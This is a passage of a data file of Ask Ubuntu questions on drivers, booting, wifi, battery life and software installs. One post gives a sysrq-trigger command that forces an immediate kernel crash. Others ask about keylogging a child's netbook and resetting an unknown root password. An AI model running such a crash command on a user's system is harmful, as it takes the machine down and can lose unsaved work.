) , but i could not run catalyst . instead , it exited with the error : no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for your amd hardware , or configure using aticonfig . next , i ran sudo amdconfig -- status=all -- initial but i could only load low-resolution graphics . this was also the case with sudo amdconfig -- initial , so i manually restored my backed up xorg.conf , removed this driver using the `` additional drivers '' application and installed the `` experimental amd binary xorg driver and kernel module '' . after rebooting my computer i see that this entry in the list has changed to be `` ati fire gl '' ( my laptop has an amd radeon hd7570m , not an ati card ? ) , but it also says that the driver is activated but not currently in use . what should i do to get the propietary drivers working on my laptop ? i have also tried the `` experimental behaviour '' fglrx drivers , but the low-detail error still returns . the only way i 've found of fixing this is restoring the original xorg.conf recap of solution - battery life up from 1.5-2 hours to 3.5-4 hours or more i ca n't post many links because my reputation on this stack exchange is too low , i 'll use titles of questions wherever possible so people can find them using google many thanks to @ gertvdijk for his help with this problem and pointers to other solutions ( is there some way i can mark something correct and give you reputation points to say `` thank you '' ? ) . i now have my laptop battery life up to ~3.5-4 hours and there may be some further steps i can take as well . to summarise my solution to date , in rough order of impact : installed propietary drivers using the 12.04 solution in the ask ubuntu question ( `` what is the correct way to install ati catalyst video drivers ( fglrx ) '' ) , then used catalyst application to switch off the amd jupiter applet - turned brightness down from 100 % to 25 % , set performance to power saving wrote a script to make it easy to turn on/off services that might be battery intensive - here turned off bluetooth ( i need to leave wifi on ) installed laptop-mode-tools - cat /proc/sys/vm/laptop_mode output 0 beforehand and 5 after , so this got turned on , but i do n't know if it had any effect ( see ask ubuntu question : `` is laptop-mode-tools still relevant for 12.04 and the 3.x kernels '' ) potential other steps i could take , but have n't yet : spin the hard disk drive down more aggressively ( laptop-mode-tools/ubuntu 12.04 defaults might do this automatically ) ( see scottl 's answer to `` tips to extend battery life for laptops and notebooks '' ) see item 3 of ishouvik.com 's `` 5 ways to extend battery life on ubuntu '' - this is meant to happen automatically in 12.04 but is n't in my /boot/grub/grub.cfg right now so it might not be turned on other power management tweaks - see ubuntu wiki page on power saving tweaks enable almp ( but it may already be enabled ? - see ubuntu wiki page on kernel power management using alpm enable i915 framebuffer compression
311863	set wine application icons in cinnamon or gnome3	in the above screenshot you can see that i am using a wine application , nemo file browser & firefox , however , i want to use a specific icon for this wine application too ! to be precise i am using pdf xchange viewer & i want to use its native windows icon in cinnamon too ! how can i do that ?
311868	how to create a shortcut for terminal program on xubuntu ?	what is the analogue for gnome-terminal -e mc on xubuntu ?
311871	`` no root file system is defined ''	have recently installed ubuntu 12.04.2 lts by usb on my newly built custom pc and i have run into a problem during installation with the error saying `` no root file system is defined . '' my pc speculations : amd phenom x4 955 black edition asrock 960gm/u3s3 fx micro atx am3+ motherboard mushkin redline 8gb ( 2x4gb ) ddr3-1866 memory seagate barracuda 1.5tb 3.5 '' 7200rpm internal hard drive xfx radeon hd 7850 1gb video card xfx 550w 80 plus bronze certified atx12v / eps12v power supply everything is new .
311873	how do i replace windows with ubuntu ?	i 've got an old windows machine that i want to replace with ubuntu . i dont want to have windows on the machine any more . how do i make that happend ?
311874	sublime text 2 move to current workspace	i was wondering if there is way to move st2 , which is already open and on a different workspace , to the current workspace if i open a file with st2 . it 's a bit annoying to search for the st2 window if the file is open in a tab . i know i can change the settings such that st2 opens a new window every time . this could be some workaround , but this is not the behavior i want . my os is ubuntu 12.04 .
311875	remove unsuccessfully installed ubuntu 12.04	i tried installing ubuntu 12.04 32-bit along side windows 8 , and i encountered an error . i determined that i need to install the 64-bit version instead . i need to delete the old directory containing the files associated with the old ubuntu installation . how can i do that ? thanks !
311884	update manager : `` could not download all repository indexes ''	failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/olivia/main/binary-amd64/packages 404 not found failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/olivia/main/binary-i386/packages 404 not found failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages hash sum mismatch failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_universe_binary-i386_packages hash sum mismatch some index files failed to download . they have been ignored , or old ones used instead .
311886	which licence text to sell my application	i would like to sell ( for a low price ) my new application without drm ( like does machinarium ) on the ubuntu software center and on a website with paypal . when i have registered my application the ubuntu software center and i 've selected the licence , i just found `` proprietary '' but in my application i have to provide a licence text that something different than just `` proprietary '' , is n't it ? do you know where i can find this kind of licence text ?
311890	hdmi works only after restart	i connect additional monitor to my laptop by hdmi . system detects second display only after restarting . xrandr command result without restarting computer : / $ xrandr screen 0 : minimum 8 x 8 , current 1600 x 900 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1600x900 60.1*+ hdmi-0 disconnected ( normal left inverted right x axis y axis ) after restart when display works properly if i disconnect it system still think that additional diplay is connected and display some windows on the disconnected diplay so i have to restart computer . i have nvidia geforce gt 120m any idea how to connect and disconnect hdmi without restarting computer ?
311892	ubuntu one startup on mac	ubuntu one is installed on my macbook , os x lion , and appears to be working fine , other than it does not appear to load automatically at startup . please note that connect automatically when computer starts is selected . is there a way to set this up , other than including it as a login item under the user & groups in system preferences ? which is what i have implemented in the interim . ( i have hide ticked so that one does not see the ubuntu one gui pop up every time one logs in ) . but i suspect that there may be a more elegant way of implementing the ubuntu one start up .
311895	open the ubuntu one folder - not working in windows 7	when i right click the ubuntu one system tray icon , and then click open the ubuntu one folder it does not open the ubuntu one folder . i have a triple booted macbook pro , the same command works perfectly under the ubuntu and mac osx lion operating systems . yet it opens fine if i click on the explore button within the ubuntu one gui on win 7 .
311897	error after installing ubuntu 13.04	i recently installed ubuntu 13.04 on my lenovo g580 . so everything went alright , then i installed kubuntu to try it out , and it was pretty laggy then i uninstalled it so everything got messed up and i got confused , so i just decided to format ubuntu and install it again . after i installed it and rebooted , i got an error message saying : `` ubuntu is blocked by the current security policy. '' . can i get some helps ?
311906	how do i get my server to boot normally again ? stuck at grub command line	all of a sudden my ubuntu 13.04 ( raring ) server does not boot correctly anymore . it stops at a grub command line . if i type ls , i get ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) ( fd0 ) i can then ls each individual partition and the only one where it finds something is hd0 , msdos1 i hooked up the hard disk to another pc and it seems to me all the data is still there ! how can i boot normally again ?
311907	no keyboard in wireless app for saucy touch 22 ?	i seem to have a problem with the recent touch release . i ca n't access the keyboard in the wireless application , however it does appear in notes . i have restarted my nexus 7 several times and it still has not appeared . i , to be honest , am wondering if i have done anything wrong . unfortunately there is nothing message wise from system , which , frankly does n't seem right , so debug info is n't included . can anyone enlighten our community ? i am using lubuntu raring to install , if it helps .
311909	virtualhost problem	i used to add virtual hosts no problem in httpd.conf . now with splitting up vhosts into separate files something 's wrong : i could only get the first of the vhosts in sites-enabled to appear . eventually i found a solution i do n't like , that works on my local linux boxes , but not on my amazon aws ubuntu server . ( the reason i do n't like it is that i 'd like to do it by making separate files , like the guides say to do it , minimizing potential problems if something is typed wrong , and i want it to work both local and remote . ) here 's what i did that ended up working locally : i added the following to the end of the apache2.conf file ( copied idea from http : //www.techstaty.com ) : < virtualhost *:80 > servername example1 documentroot /var/www/example1 errorlog /var/www/logs/error_log customlog /var/www/logs/custom common < /virtualhost > < virtualhost *:80 > servername exampletwo documentroot /var/www/exampletwo errorlog /var/www/logs/error_log customlog /var/www/logs/custom common < /virtualhost > updating /etc/hosts file : 127.0.0.1 localhost example1 exampletwo works fine . the reason i do n't like it is that i do n't understand why not putting them in separate files in sites-available , then a2ensite example1 , ditto for exampletwo , and a2dissite default , then restarting the server , does n't make my two virtual hosts work . i read that if you always get the first alphabetical virtual server no matter which host you request , the server is confused . so how do i test to figure out what 's wrong ? why does it work on my two local ubuntu boxes ( 12.10 & 12.04 ) , but not on the amazon aws ubuntu 12.04 instance ? apache2ctl configtest says : syntax ok. and restarting apache2ctl graceful shows no errors . i 've also checked the access & error logs w/o gaining insight . i also tried : a2enmod vhosts_alias but that made no difference . ( i figure my problem is prior to someone trying : www.ex ... rather than : example1 . )
311910	how can drag music to my apple iphone 4s	i want to know how to drag and sync all my apple devices to linux because i already tried using rythymbox , banshee , clementine , etc ... .
311911	how do i install red5 using apt-get ? getting sub-process error	this is copy from question of some guy on other forum that never got satisfiably answered . i encountered the same error few days ago on ubuntu 13.04 desktop . it seems like red5 is installed but it can not be run for some reason . can anyone explain what is going on here ? why should dpkg fail ? i mean , this is checked repo , it should work fine . apt-get install red5-server selecting previously deselected package red5-server . ( reading database ... 53491 files and directories currently installed . ) unpacking red5-server ( from ... /red5-server_0.9.1-4squeeze1_all.deb ) ... setting up red5-server ( 0.9.1-4squeeze1 ) ... starting flash streaming server : red5-server failed ! invoke-rc.d : initscript red5-server , action `` start '' failed . dpkg : error processing red5-server ( -- configure ) : subprocess installed post-installation script returned error exit status 1 configured to not write apport reports errors were encountered while processing : red5-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) logfile error.log in /usr/share/red5/log was completely empty . other logs were not but according to them , there were no problems at all .
311916	dual hdd ; reinstalled windows and now ca n't go past boot screen logo	so i have a three drive set up . 1 ssd ( windows 7 ) , 1 hdd ( windows 7 storage ) , 1 hdd ( ubuntu 12.04 ) . i was not thinking and reinstalled windows and messed it up . if i have the ubuntu hdd disconnected , then i boot into windows like normal . if i have the ubuntu hdd connected , then i get stuck at my motherboard 's boot screen logo . i can not access anything through f2/del ( uefi ) or f11 ( boot menu ) . because of this , i can not do anything with the ubuntu hdd whether it be through uefi or windows or even a livecd/liveusb , because with the ubuntu hdd plugged in , i can not go past the asrock boot screen .
311923	how would i make a simple indicator program to record timestamps ?	i would like to make a button to sit up next to my sound/wireless/etc indicators which , when toggled , will change color and write the system time with the word `` begin '' to a file , then , when toggled again , return to its original color and record the system time with the word `` end . '' ideally , the button would maintain it 's toggled/untoggled state even if the system restarts . i ca n't imagine this would be a difficult program to make at all , but i am a bit new to ubuntu and i 'm not sure how to make a program work as an indicator , or how to make something maintain its state on system restart .
311924	can my 2 gb sd card be used as ram like in windows 7 ?	i 'm trying to increase the ram on my old computer with a 2 gb sd card . you can configure windows to use an sd card like ram and i 'm wondering if ubuntu has that same ability .
311925	how can i fix error : hd0 out of disk ?	i am running ubuntu 12.04 on a netbook - acer as 1410 . after a download session , i restarted the computer and it said : error : hd0 out of disk . press any key to continue ... i pressed everything , but it 's just frozen there . any idea what 's wrong with it and what i can do to fix it ? i have n't been able to run my computer at all since it 's frozen like that . help please ! i booted the live cd and ran sudo fdisk -lu into terminal , and here 's what it gave me : disk /dev/sda : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9a696263 device boot start end blocks id system /dev/sda3 2048 117229567 58613760 5 extended /dev/sda5 * 71647232 109039615 18696192 83 linux /dev/sda6 109041664 117229567 4093952 82 linux swap / solaris /dev/sda7 4096 71645183 35820544 83 linux partition table entries are not in disk order i am somewhat of a beginner in this , so do n't know what this means . any ideas ? thanks !
311934	asus rog g53jw screen wont dim	hi i have a rog g53jw laptop running ubuntu 13.04 and windows . in ubuntu i am unable to dim the screen . the hot keys register but wo n't dim . dimming the screen in setting wo n't work ether . i 'm wondering if others have had this problem and know of a fix .
311935	encrypted home directory will not generate passphrase	when i run the command ecryptfs-unwrap-passphrase , the passphrase will not appear . i do not know why that is , and i would like some help on this .
311936	just installed ubuntu 13.04 is running extremely slow	i 'm new in the linux os , i just installed ubuntu 13.04 32 bits but itâ´s running very slow , whatever i do it takes a lot . i have a : motherboard : via pc3500g memory : 1gb ddr2 graphics : integrated via chrome9 hc graphics core with chromotion ce 1.8ghz via c7-d processor im new using this os any help would be very helpful .
311942	windows sleep wakes in ubuntu	im new here , and im having an issue . im using windows 7 sideloaded with ubuntu . the issue is , whenever i put my pc to sleep in the windows os , it wakes up in ubuntu on the login screen . i dont know whats causing the issue , but i am not very happy about it haha . any tips or suggestions
311948	how can i fix wacom intuos5 button mapping and compatibility issues ?	for the most part my tablet works out of box but with limitations . the wheel when scrolling just flickers the 4 leds . i can not map modifier buttons ctrlshift . i want to be able to activate precision mode like i did on windows . it would also be great to have the overlay when i hover my finger over the buttons . also , since i got the wireless accessory for my tablet not that long ago i have come across a new problem : i lost some of my mapping options . i used to have the 6 buttons , ring button switcher , and 4 ring up/down modes . now all i have is 3 ring up/down modes .
311952	photorec not asking for file types	i am trying to use photorec version 6.13 to recover data from my formatted hard disk . while i see that , photorec is recovering the files , ( i selected the saved file location in a usb drive . ) but , it did not ask me what type of files to recover . ( i only want my photos back , so , jpg is the only file type i want to recover ) but , i see there is such an option in the tutorials of photorec . am i doing anything wrong ? or is there anyway to add file types to recover ? would it be fixed if i install photorec 6.11 ? any help would be greatly appreciated . thanks
311953	is there a way ( hack ) to enable screen lock but not to lock on lid close ?	here 's exactly what i wanted to do : turn on lock ( settings > brightness and lock ) , set the time to wait ( lock screen after : ) , but not to lock the screen ( e.g . no password prompt ) if i 'd only close ( and of course open ) the lid . i 'm not sure if there 's some tweak/hack to be able to do that . ( i 'm always walking out of my desk but my machine always does something , so `` do nothing '' on lid close , but it 's a little annoying to keep typing the password like 4x an hour . i need to have it lid closed . but , sometimes i do leave my desk for more than an hour and forgot to ctrl+alt+l . i 'd like it to lock automatically like after an hour of inactivity . if scripting is the only way to do it , can you please help me where to start ? thanks in advance . ) ubuntu 12.04.02 , lightdm , gnome shell
311957	ubuntu 13.04 boot problem	my ubuntu 13.04 , when i boot it , it takes me to the password screen , so i enter my password , then the backlight shuts off and a few seconds later it automatically takes me to a thing called busy-box . i 'm very new to ubuntu and am really confused because when i key in `` exit '' it says it panics , then the pc crashes . help !
311958	help with getting netflix to work ?	i tried getting it to work through here : http : //www.omgubuntu.co.uk/2013/01/how-to-watch-lovefilm-redbox-instant-or-netflix-on-ubuntu # content but nothing has worked ! any suggestions ?
311960	very slow mouse on login screen	i have just finished installing ubuntu 12.04.2 lts 32 bits on my toshiba satellite l355d-s7809 laptop . i have performed apt-get update and upgrade and rebooted . the mouse movement on the login screen is very slow . after logging in it works fine . how can i troubleshoot it ? the mouse is an usb mouse from an extremely generic brand , it works fine on windows and on ubuntu other than on login screen .
311970	new computer , already has ubuntu	i just now got a new computer today from a friend . i have researched all the posts on google to try to find out how to reset the root password since i do not know it and can not get ahold of him . tried remounting , tells me it can not find it . tried going through the recovery menu , of course i get the error since it is in read-only . when i tried to go through the fdisk to get it into read-only , it said something about checked etc clean blocks and then sits there . i do not know what to do at this point . any help would be appreciated
311972	onscreen keyboard like behaviour of regular keyboard	when i hold down a key on a regular keyboard , the key gets repeated over and over . i do see the advantages of that for an electrical typewriter . on android ( and other glass pecking devices ) when i hold down a key it shows me letter variations like u ü û ů . is there such functions for ubuntu ? show the variations with a number next to it ( left , right , top , below ) like double byte input and insert on number or click ? update : mac os/x does exactly that . if that 's part of darwin ( ? ? ) it could be ported ?
311975	how to start gui application on a remote ubuntu box via ssh	i can log into the remote ubuntu ( kubuntu 12.04 ) machine . using the info from ( how to start a a gui software on a remote linux pc via ssh ) i tried the following after logging in : user @ kub : ~ $ export display=:0 user @ kub : ~ $ firefox no protocol specified no protocol specified no protocol specified no protocol specified error : can not open display : :0 i expected the same success as stated at the question referenced . unfortunately , as you see it did n't work for me . the machine has 3 displays . could that be the issue ? is there a simple solution ? i also read ( http : //unix.stackexchange.com/questions/10121/open-a-window-on-a-remote-x-display-why- can not -open-display ) but i did n't understand how to use or apply that advice . it was too complicated . i appreciate any relatively simple solutions . i looked at a running gui process ( kate ) with this : # cat /proc/2857/environ | tr \\0 \\n | grep -e '^ ( display|authority ) = ' display=:0 that further confuses me as to why this did n't work . using scott goodgame 's suggestion ( below ) , i tried this : login with -x and -c options on ssh . export display=:0 firefox & the result was : $ no protocol specified no protocol specified no protocol specified no protocol specified error : can not open display : :0
311977	`` no boot device available '' after dual boot install attempt with windows 8	i was trying to install ubuntu to my dell inspirion desktop that already has windows 8 ( machine is a couple months old ) . here 's the string of events as they played out : i followed the instructions here to create two new partitions ( swap space & primary ) as described here : http : //www.liberiangeek.net/2012/04/dual-boot-windows-7-and-ubuntu-12-04-precise-pangolin/ and finished the install wizard . after which , windows 8 was loading as it normally had in the past . ( i.e . nothing appeared to have changed from a boot perspective ) ran boot-repair off ubuntu cd & received locked-esp detected error message saw this site : hxxp : //ubuntuforums.org/archive/index.php/t-2112273.html , so removed the boot flag for /dev/sda1 & restarted with the intention of following the rest of the steps . nothing now loads . following message displays on load : no boot device available sata0 : installed . sata1 : installed . i tried going to legacy boot but ultimately switched back to uefi as i did n't think it was accomplishing anything i have also disabled secure boot in the bios -- - with no perceived affect . i also tried setting gparted boot flag to the ubuntu partition vice windows partition with no affect . i 'm kind of lost here , as this is beyond my technical knowledge -- so any assistance or tips would be greatly appreciated . here is my pastebin from bootrepair : http : //paste.ubuntu.com/5794027/
311980	ubuntu 13.04 'brightness and lock ' not working !	i am unable to change the brightness of my acer aspire v3-571-6850 laptop . my system details are : memory : 7.6 gib processor : intel core i5-3210m cpu @ 2.50ghz * 4 graphics : intel ivybridge mobile os type : 64-bit disk : 730.0gb
311989	google chrome app shortcuts do n't work	when i create app shortcuts in google chrome , the shortcut icons appear , but they do n't work . any idea why ? i 'm running ubuntu 13.04 and chrome 28.0.1500.29 beta .
311991	what are offical requirements for ubuntu 13.04 ?	i have a pentium dual core 2.50 ghz and having 2gb ddr2 ram and 512 mb nvidia 8 series graphic card . will ubuntu 13.04 run on my system faster than windows 7 . would i be able to run 64 ubuntu on my pc ?
311996	ubuntu 13.04 boots into terminal	i upgraded from ubuntu 12.10 to ubuntu 13.04 . since update the system boots in to tty . currently the default is kernel 3.8 ; however using advanced menu entries , the gui loads successfully using kernel 3.5. how to make it default ? any solution to get 3.8 working ?
311997	how to download and install hide my ass in ubuntu 12.04	i am using ubuntu 12.04 and i want to use hide my ass but i could n't do this . i do n't know procedure of download and install hide my ass in ubuntu .
311998	partitioning the hard drive	i just built my first computer and it works ( kind of ) . i want to have both ubuntu , windows and 1 other os , but i do n't know how to partition the drive . i go to `` install ubuntu '' then `` continue '' then i click `` something else '' then i click continue . and here it lets me make partitions but i do n't know what to do . i have 1 tb of hard drive and 8 gb of ram . -gus
312001	what are the new features of ubuntu 13.04 ?	i just installed 13.04 from ( 12.10 ) graphics are great except the dropdown folder feature is gone.there was no preview about what changes there are and i thought is was a software update..like of the ones that appear when opening firefox . now there is now feature in the help menu for new features . i also can not find anything online . help , i am afraid i should not have installed the upgrade .
312005	is laptop-mode-tools still relevant on 13.04 ?	do they make some difference ? i read in ubuntu wiki that actually it has good power configuration management out of box .
312007	gdbus.error : org.openobex.error.failed : no adapter found	hcitool scan is working fine but bluetooth-sendto is giving error gdbus.error : org.openobex.error.failed : no adapter found somebody help me
312009	lenovo e530 no wireless ubuntu 13.04	for some reason my wireless will not work on my lenovo e530 . i am dual booting ubuntu and windows 8 and my wireless works in windows . i saw online that i should run rfkill . i did that but only bluetooth shows up . there is no difference when i press the wireless fn key either , but it does block bluetooth ( as it should ) . i 'm really wanting to get into ubuntu but this is holding me back . to clarify the wireless device does not show at all after running rfkill .
312020	wifi problem in sony vaio	how can i use wifi in ubuntu13.04.in the system settings wifi hardware is not displayed . i am using sony vaio vpceh25en.when i run this command in terminal rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : sony-wifi : wireless lan soft blocked : no hard blocked : yes 2 : sony-bluetooth : bluetooth soft blocked : no hard blocked : yes 3 : hci0 : bluetooth soft blocked : no hard blocked : no this message came.please somebody help me to activate my wifi..thanks
312022	kernel panics randomly	my system randomly crashes . i can not reproduce the crash except using this command : echo c | sudo tee /proc/sysrq-trigger everytime it crashes ( like once a week ) . i can boot and work with the machine , but at some point it crashes . i did the normal kernel updates and installed and uninstalled several things . this did not affect the problem . ich am using 13.04 64bit . here is the link to the syslog of the time of the crash so , any suggestions ? i do not even know if it is a software or hardware problem ... the system : samsung np530u3c-a0b with intel core i3-3217u cpu @ 1.80ghz ă 4 graphics : vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : samsung electronics co ltd device [ 144d : c0d7 ] kernel driver in use : i915 bios information : vendor : phoenix technologies ltd . version : p01abh release date : 08/21/2012 address : 0xe0000 runtime size : 128 kb rom size : 3072 kb hardware information : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 06 )
312027	installing matlab on ubuntu 12.04 32bits	i am trying to install matlab on ubuntu 12.04 , i have a 32bits machine . i downloaded the files and set the file install to exectable , then run : $ ./install -v but then i got the error : error : can not locate java runtime environment ( jre ) . the directory /unix_mac/sys/java/jre/glnx86/jre does not exist . so i decided to add the path of matlab 's jre to the command ( but before i went to sys/java/jre/glnxa64/jre/glnxa64 and changed the file java to executable ) , then tried : $ ./install -v -javadir /home/mbenseddik/unix_mac/sys/java/jre/glnxa64/jre/ but then i got the following error : preparing installation files ... cp : impossible d'évaluer «/home/mbenseddik/unix_mac/bin/glnx86/*» : no such file or directory - > dvd = /home/mbenseddik/unix_mac - > arch = glnx86 - > display = :0.0 - > testonly = 0 - > jre_loc = /tmp/mathworks_11294/sys/java/jre/glnx86/jre - > ld_library_path = /tmp/mathworks_11294/bin/glnx86 command to run : /tmp/mathworks_11294/sys/java/jre/glnx86/jre/bin/java -xmx512m -splash : '' /home/mbenseddik/unix_mac/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_11294/sys/java/jre/glnx86/jre/lib/ext : /tmp/mathworks_11294/java/jar : /tmp/mathworks_11294/java/jar/ja_jp/ : /tmp/mathworks_11294/java/jar/zh_cn/ : /tmp/mathworks_11294/java/jarext : /tmp/mathworks_11294/java/jarext/axis2/ : /tmp/mathworks_11294/java/jarext/guice/ : /tmp/mathworks_11294/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` /home/mbenseddik/unix_mac '' -tmpdir `` /tmp/mathworks_11294 '' installing ... /tmp/mathworks_11294/sys/java/jre/glnx86/jre/bin/java : 1 : /tmp/mathworks_11294/sys/java/jre/glnx86/jre/bin/java : syntax error : `` ( `` unexpected finished it seems like it is looking for glnx86 whereas the only directory inside the sys/java/jre directory is glnx64 ... any idea on the matter ?
312031	bash script isnt working	i have written this simple type alias script in my bin dir in home # ! /bin/sh alias kp='ls âl' alias ldir='ls âaf' alias copy='cp' and saved it in the name myenv.then i have changed the mode using chmod +x /bin/myenv then execute it using the command myenv but after this when i use kp it says kp command not found.why ?
312035	causes of files disappearing and ways of prevention ?	my brother told me two weeks ago that some of his files were missing and last week all of his files disappeared ( together with some installed programs ) . the weird thing is that the folder structures are still there - it is just the files in the folders that are missing . it seems that i can recover the non-backed-up files with photorec ( of testdisk ) , but would like to know what can cause this and how do i prevent it from happening in the future ? p.s we did clean the computer with an air blower right before all the files disappeared , but i doubt that this can cause it seeing that some disappeared before then and the computer only has xubuntu 13.04 on it . edit i forgot to mention that all configs were also reset ( launcher ( s ) settings and background , including email accounts ) .
312037	how do i use the malayalam language in libreoffice writer ?	i have installed malayalam fonts from software center on my ubuntu 13.04 installation . in libreoffice writer i can see the installed malayalam fonts like meera , rachana . i would like to create a document in malayalam fonts . i activated it in fonts selecting to meera and rachana , but when i type in document it 's still english . i hope i have n't enabled some options i should n't have . please guide me the right way to attain my requirement .
312039	remove unwanted lenses from installing unity next	so i followed instruction provided here to set up unity next , and it give me two additional lenses on ubuntu dash . now i 'm done with it and i want to remove the additional lenses , how to do it ?
312043	huawei modem e173 not connecting on ubuntu 13.04 ?	is their a new version of modem manager ( 0.6.0 ) ? help !
312044	`` whosthere '' app is not installing in ubuntu 13.04	i 'm getting this error '' e : package 'whosthere ' has no installation candidate '' '' e : unable to locate package telepathy-whosthere '' any ideas how to fix this please ?
312045	usb port not working , while shutdown and network manager are misbehaving	i use an acer aspire one with xubuntu ( 12.04 ) . last night i installed a few updates , only the security ones because it was late . it finished ok with a message about needing to restart for the changes to be effective . today i have 3 issues : the first is that network manager is misbehaving . the network icon is 2 little arrows . hovering over it gives the help text : networking disabled . clicking on it says : networkmanager is not running ... and a right click shows a limited menu ( 3 lines ) with only one option not greyed out : edit connections . if i check with service network-manager start , it says start : job is already running : network-manager . i tried to stop then , restart . the networking icon has n't changed , but the messages are different : hovering over it is still the same ( networking disabled ) but with left click it says no network devices are available ( in grey ) and i can click on vpn connections . while on right click it gives the same menu as previously , but now the greyed out enable networking has a tick in front of it . i searched online , and the closest i found was this . although i am not running mate . the second problem is that when i click on the shutdown icon i get an error window : unable to perform shutdown shutdown command failed and i can only click on quit or hit enter , which brings me to a login screen . attempts to shutdown from there fail too . i can however shutdown by typing sudo shutdown -p 0 in a terminal . finally , the usb ports do not work , in as much as i can not mount anything inserted . the memory slot does not work either . as i only noticed this last issue after posting my original question i will go and search online some more to see if i can revert to the pre-upgrade situation without going online nor using a usb port . many thanks anne
312048	external monitor unstable	i have recently attached an external monitor ( iiyama lcd ) to my lenovo t430s ( intel hd4000 ) . attaching went fine with the automagic setup etc. , but the image on the external monitor is a bit unstable on light colours . it looks like wobbly lines moving upward . it gives you a dizzy feeling when looking to long at it ; ) i checked with xrandr and all looks fine in the config . when i set up my external monitor as main and switch of the screen of the lenovo all is stable again . it almost looks from my perception that the hd4000 ca n't cope with two screen . that seems unlikely as i also saw setups with two external monitors attached . what could be the problem here and how to solve this ? thanks
312056	installing 12.04 alongside windows 7	trying to install ubuntu 12.04 alongside windows 7 home . however when i get the installation option it says that there are already multiple os installed and it dos n't give *me the option to install ubuntu alongside windows . * the problem is that i have no other os installed . no my question hasnt been answered at installing ubuntu with windows , which is left and right when allocating space ? 5 answers my question has nothing to do with which is left and right when allocating space ? please read question before posting an unrelated answer
312061	how to stop killing browser by terminal	i am using ubuntu . my friend is killing my browser from his ubuntu machine using terminal . he knows my password . do let me know any way to stop this killing process . i know that changing the password will be the solution . but i want to know the other ways to stop it . he is doing it via ssh .
312063	keylogging using ubuntu 1	my 13 year old son has latitude 2100 netbook driven by ubuntu 1 . we are concerned he is being bullied online , therefore i have downloaded the keylogging patch from the website to monitor his activity however i can find no information as to if this is the case or how i access his activity . where or how do i find this information ?
312064	what development tools and languages are used for ubuntu mobile app development ?	i am new here , i am working with ios development , now i also want to learn to develop ubuntu apps . what are the standard requirement to develop ubuntu mobile apps ? can i develop ubuntu apps in windows machine ? or am i required to use ubuntu ?
312069	problem opening a file without an extension	i have downloaded a file called multimc . i 'm used to windows where everything needs a file extension to run . the thing about this file is , it has no file extension . according to the instructions , i 'm to mark it as an executable and then double click it . so i marked it and double clicked it and nothing happened . i tried spam clicking it , which did nothing in the end . i 'm using the latest dev build of ubuntu and i know for a fact other people are using this program on ubuntu as well . i have do idea how to use terminal properly . please tell me what i 'm doing wrong and please simplify it as much as possible . thanks !
312070	keyboard not working in terminal	i 'm using ubuntu 12.04.2 lts . dual boot with windows 7 . but my keyboard is not working properly in terminal . while typing , when i press up arrow key it is displaying `` a '' letter and when i press down arrow key it is displaying `` b '' letter . please help me out .
312074	how to get package ubuntu 11.04	i need to get old version package because some site ask me to develop security package that made by my company . so i need old version package anyway i just type the apt-get install vim ... but i could not get anyting i just get error message so i was looking for site that i downloads old version package.. is therer any way to get some devel package in ubuntu11.04 . two month ago it was possibie.. but there is anymore site i can download deb package..
312075	how to recover files deleted in encrypted home before a failed upgrade ?	i 'm going to give you real breakdown of events to clarify what has happened . i’ve just rebuilt a rig i haven’t used for almost a year , it 's running windows 7 and ubuntu 10.04 . i couldn’t remember the login for windows so was recovering files in ubuntu and preparing to wipe windows 7 , i recovered some files and deleted some files . i got a popup saying ubuntu is ancient and needs upgrading as its not supported so i clicked upgrade via update manager , it did its thing and started to download the files . this was unsuccessful at the install stage , it was stuck for hours so it got shut down at 3am . the next day , i booted up and it says on start screen ubuntu 11.10 with the little dots but doesn’t boot , i tried previous linux versions in grub with same result . to make matters worse i remember my windows login and boot it up to be confronted with a temporary profile as some of the files removed/deleted are needed for the profile . i 'm using a live usb of 12.04 lts and have used ecryptfs-recover-private and have access to the encrypted home folder from 10.04 but i can not find these deleted files , i 've checked in ~/.local/share/trash and the three folders are empty . so i may have emptied the trash bin , i can not remember , but i know there are still techniques to recover the files . so after all this , i would like to recover my install of ubuntu 10.04 or recover the lost data , copy and save all the important files 